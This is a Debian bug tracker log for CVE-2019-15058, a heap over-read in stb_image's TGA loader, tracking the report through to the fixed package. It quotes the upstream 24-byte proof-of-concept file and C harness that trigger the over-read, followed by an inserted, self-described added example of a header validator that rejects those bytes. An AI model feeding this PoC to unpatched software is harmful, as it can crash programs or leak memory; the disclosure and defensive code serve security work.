Debian Bug report logs - #934973
libstb: CVE-2019-15058


Package: src:libstb; Maintainer for src:libstb is Yangfl <mmyangfl@gmail.com>;

Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Sat, 17 Aug 2019 14:15:02 UTC

Severity: important

Tags: fixed-upstream, security, upstream

Found in version libstb/0.0~git20190617.5.c72a95d-2

Fixed in version libstb/0.0~git20210910.af1a5bc+ds-1

Done: Yangfl <mmyangfl@gmail.com>

Bug is archived. No further changes may be made.

Forwarded to https://github.com/nothings/stb/issues/790



Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, team@security.debian.org, Yangfl <mmyangfl@gmail.com>:
Bug#934973; Package src:libstb. (Sat, 17 Aug 2019 14:15:05 GMT)


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, team@security.debian.org, Yangfl <mmyangfl@gmail.com>. (Sat, 17 Aug 2019 14:15:05 GMT)


Message #5 received at submit@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: libstb: CVE-2019-15058
Date: Sat, 17 Aug 2019 16:11:48 +0200
Source: libstb
Version: 0.0~git20190617.5.c72a95d-2
Severity: important
Tags: security upstream
Forwarded: https://github.com/nothings/stb/issues/790

Hi,

The following vulnerability was published for libstb.

CVE-2019-15058[0]:
| stb_image.h (aka the stb image loader) 2.23 has a heap-based buffer
| over-read in stbi__tga_load, leading to Information Disclosure or
| Denial of Service.

To reproduce the issue, the upstream issue provides a PoC:

|#define STBI_WINDOWS_UTF8
|#define STB_IMAGE_WRITE_IMPLEMENTATION
|#include "stb_image_write.h"
|#define STB_IMAGE_IMPLEMENTATION
|#include "stb_image.h"
|#define STB_DEFINE
|#include "stb.h"
|#include<stdio.h>
|#include<stdlib.h>
|unsigned char data[] =
|{
|  0xAF, 0x01, 0x09, 0x00, 0x00, 0x00, 0x00, 0x10, 0x14, 0x0A,
|  0xAF, 0x00, 0xEF, 0xEF, 0xEF, 0x11, 0x10, 0xEF, 0xEB, 0xF5,
|  0x50, 0xFE, 0xFE, 0x09
|};
|int main(int argc, char **argv)
|{
|    int x,y,n;
|    stbi_load_from_memory(data,sizeof(data),&x,&y,&n,4);
|    return 0;
|}

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2019-15058
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15058
[1] https://github.com/nothings/stb/issues/790

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore
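The PoC above is a 24-byte file: an 18-byte TGA header followed by six bytes. The header advertises a colour-mapped RLE image (type 9) with a colour map declared present but of length zero, an image id field of 175 bytes, and dimensions of 0xEFEF x 0x11EF at 16 bits per pixel, none of which the remaining input can back up. The following is an added example, not code from the bug report, the stb project, or the Debian package, and it does not reproduce stb's internal logic or claim which of these fields is the one that makes stbi__tga_load over-read. It shows the header-consistency check a loader needs before it reads colour-map or pixel bytes: it decodes the PoC bytes and rejects them, rejects a constructed truecolour file whose pixel data is truncated, and accepts a constructed 1x1 file. The struct and function names are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 24 PoC bytes exactly as posted in the upstream issue / bug report. */
const uint8_t cve_2019_15058_poc[] = {
    0xAF, 0x01, 0x09, 0x00, 0x00, 0x00, 0x00, 0x10, 0x14, 0x0A,
    0xAF, 0x00, 0xEF, 0xEF, 0xEF, 0x11, 0x10, 0xEF, 0xEB, 0xF5,
    0x50, 0xFE, 0xFE, 0x09
};
/* Constructed: uncompressed truecolour (type 2), 24 bpp, 1x1, 3 pixel bytes. */
static const uint8_t tiny_ok[] = {
    0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 24, 0, 0x11, 0x22, 0x33
};
/* Constructed: same layout but 2x2, so 12 pixel bytes are promised and 5 given. */
static const uint8_t truncated[] = {
    0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 2, 0, 24, 0, 1, 2, 3, 4, 5
};

/* Fields of the fixed 18-byte TGA header; multi-byte fields are little-endian. */
struct tga_hdr {
    uint8_t  id_len, cmap_type, img_type;
    uint16_t cmap_first, cmap_len;
    uint8_t  cmap_bits;
    uint16_t x_org, y_org, width, height;
    uint8_t  bpp, descriptor;
};

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Check that the header is internally consistent and that the input really
 * contains the bytes it promises. Returns 1 and fills *h on success, else 0
 * with a reason in *why. RLE pixel streams are variable-length, so for types
 * 9/10/11 only the fixed-size parts (id field, colour map) are checked here;
 * the RLE decoder itself must still bounds-check every packet it reads. */
int tga_validate(const uint8_t *buf, size_t len, struct tga_hdr *h, const char **why)
{
    if (len < 18) { *why = "input shorter than 18-byte header"; return 0; }
    h->id_len     = buf[0];
    h->cmap_type  = buf[1];
    h->img_type   = buf[2];
    h->cmap_first = le16(buf + 3);
    h->cmap_len   = le16(buf + 5);
    h->cmap_bits  = buf[7];
    h->x_org      = le16(buf + 8);
    h->y_org      = le16(buf + 10);
    h->width      = le16(buf + 12);
    h->height     = le16(buf + 14);
    h->bpp        = buf[16];
    h->descriptor = buf[17];

    int rle, mapped;
    switch (h->img_type) {
    case 1: case 2: case 3:   rle = 0; break;
    case 9: case 10: case 11: rle = 1; break;
    default: *why = "unknown image type"; return 0;
    }
    mapped = (h->img_type == 1 || h->img_type == 9);

    if (h->cmap_type > 1) { *why = "unknown colour map type"; return 0; }
    if (h->width == 0 || h->height == 0) { *why = "zero width or height"; return 0; }
    if (h->bpp != 8 && h->bpp != 15 && h->bpp != 16 && h->bpp != 24 && h->bpp != 32) {
        *why = "unsupported bits per pixel"; return 0;
    }
    if (mapped) {
        /* A colour-mapped image with no colour map leaves every pixel index
         * pointing at memory the file never supplied. */
        if (h->cmap_type != 1 || h->cmap_len == 0) {
            *why = "colour-mapped image declares no colour map"; return 0;
        }
        if (h->cmap_bits != 15 && h->cmap_bits != 16 && h->cmap_bits != 24 && h->cmap_bits != 32) {
            *why = "unsupported colour map entry size"; return 0;
        }
        if (h->bpp != 8 && h->bpp != 16) { *why = "colour-mapped index must be 8 or 16 bits"; return 0; }
    }

    /* Walk the promised regions and make sure each fits in what is left. */
    size_t off = 18;
    if (h->id_len > len - off) { *why = "image id field exceeds input"; return 0; }
    off += h->id_len;
    if (h->cmap_type == 1) {
        uint64_t cmap_bytes = (uint64_t)h->cmap_len * ((h->cmap_bits + 7u) / 8u);
        if (cmap_bytes > (uint64_t)(len - off)) { *why = "colour map exceeds input"; return 0; }
        off += (size_t)cmap_bytes;
    }
    if (!rle) {
        uint64_t pix_bytes = (uint64_t)h->width * h->height * ((h->bpp + 7u) / 8u);
        if (pix_bytes > (uint64_t)(len - off)) { *why = "pixel data truncated"; return 0; }
    }
    *why = "ok";
    return 1;
}

/* Convenience wrapper returning only the verdict string. */
const char *reason_for(const uint8_t *buf, size_t len)
{
    struct tga_hdr h; const char *why;
    tga_validate(buf, len, &h, &why);
    return why;
}

int main(void)
{
    printf("PoC:        %s\n", reason_for(cve_2019_15058_poc, sizeof cve_2019_15058_poc));
    printf("1x1 file:   %s\n", reason_for(tiny_ok, sizeof tiny_ok));
    printf("truncated:  %s\n", reason_for(truncated, sizeof truncated));
    return 0;
}
```

The check is deliberately run on the raw bytes before any allocation or pixel loop, because that is where an image loader has to decide whether the declared sizes are plausible; a header that passes here can still be malicious in its RLE packets, so the decoder's own per-packet bounds checks are not optional.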



Added tag(s) fixed-upstream. Request was from debian-bts-link@lists.debian.org to control@bugs.debian.org. (Mon, 05 Jul 2021 17:21:24 GMT)


Reply sent to Yangfl <mmyangfl@gmail.com>:
You have taken responsibility. (Sun, 23 Jan 2022 16:09:07 GMT)


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Sun, 23 Jan 2022 16:09:07 GMT)


Message #12 received at 934973-close@bugs.debian.org:

From: Debian FTP Masters <ftpmaster@ftp-master.debian.org>
To: 934973-close@bugs.debian.org
Subject: Bug#934973: fixed in libstb 0.0~git20210910.af1a5bc+ds-1
Date: Sun, 23 Jan 2022 16:06:16 +0000
Source: libstb
Source-Version: 0.0~git20210910.af1a5bc+ds-1
Done: Yangfl <mmyangfl@gmail.com>

We believe that the bug you reported is fixed in the latest version of
libstb, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 934973@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Yangfl <mmyangfl@gmail.com> (supplier of updated libstb package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)



Format: 1.8
Date: Sun, 23 Jan 2022 16:57:05 +0800
Source: libstb
Architecture: source
Version: 0.0~git20210910.af1a5bc+ds-1
Distribution: unstable
Urgency: medium
Maintainer: Yangfl <mmyangfl@gmail.com>
Changed-By: Yangfl <mmyangfl@gmail.com>
Closes: 934973
Changes:
 libstb (0.0~git20210910.af1a5bc+ds-1) unstable; urgency=medium
 .
   * New upstream snapshot
     + Fix CVE-2019-15058 (Closes: #934973)
   * Bump Standards-Version to 4.6.0
   * Add upstream metadata
Checksums-Sha1:
 f72168ca05b9fd5f42836084c3f9da88260e3f6e 2061 libstb_0.0~git20210910.af1a5bc+ds-1.dsc
 cdd6eb6ed61dcacb7508540fb97ccf77a776fe27 1083908 libstb_0.0~git20210910.af1a5bc+ds.orig.tar.xz
 d4b6c57ce292be17df612c679d6de9029584b605 14676 libstb_0.0~git20210910.af1a5bc+ds-1.debian.tar.xz
 15f562cd94bd06fd4b6203510fb131dc7868230c 6653 libstb_0.0~git20210910.af1a5bc+ds-1_amd64.buildinfo
Checksums-Sha256:
 675190d2a6ac1e153e269a173cdee610eeb3bf6f01c6fb0f5065a237a3dfdfc5 2061 libstb_0.0~git20210910.af1a5bc+ds-1.dsc
 042ae97ce73385a4b43a8d9615869eebc2187afa17689fe312b4a5b60da2044a 1083908 libstb_0.0~git20210910.af1a5bc+ds.orig.tar.xz
 a68cf532d42284c4ef1a26a2ed62bc0cdab18917872c68d153e2603b7eeeb3fe 14676 libstb_0.0~git20210910.af1a5bc+ds-1.debian.tar.xz
 4912b726410ee9707ae574644c6bcd703591c37c90dc79fd7623cf0f80b9cf77 6653 libstb_0.0~git20210910.af1a5bc+ds-1_amd64.buildinfo
Files:
 fa3d1dedfc4d29916896da025b017b31 2061 libs optional libstb_0.0~git20210910.af1a5bc+ds-1.dsc
 93bd7392a0f241d1e49c5d947feacd6e 1083908 libs optional libstb_0.0~git20210910.af1a5bc+ds.orig.tar.xz
 aa7f86e473d6778b1e5d3f44f9f997d9 14676 libs optional libstb_0.0~git20210910.af1a5bc+ds-1.debian.tar.xz
 d6ad87229776cb18feb482a6d97dca10 6653 libs optional libstb_0.0~git20210910.af1a5bc+ds-1_amd64.buildinfo





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sat, 26 Feb 2022 07:31:03 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Aug 2 01:08:36 2024; Machine Name: buxtehude
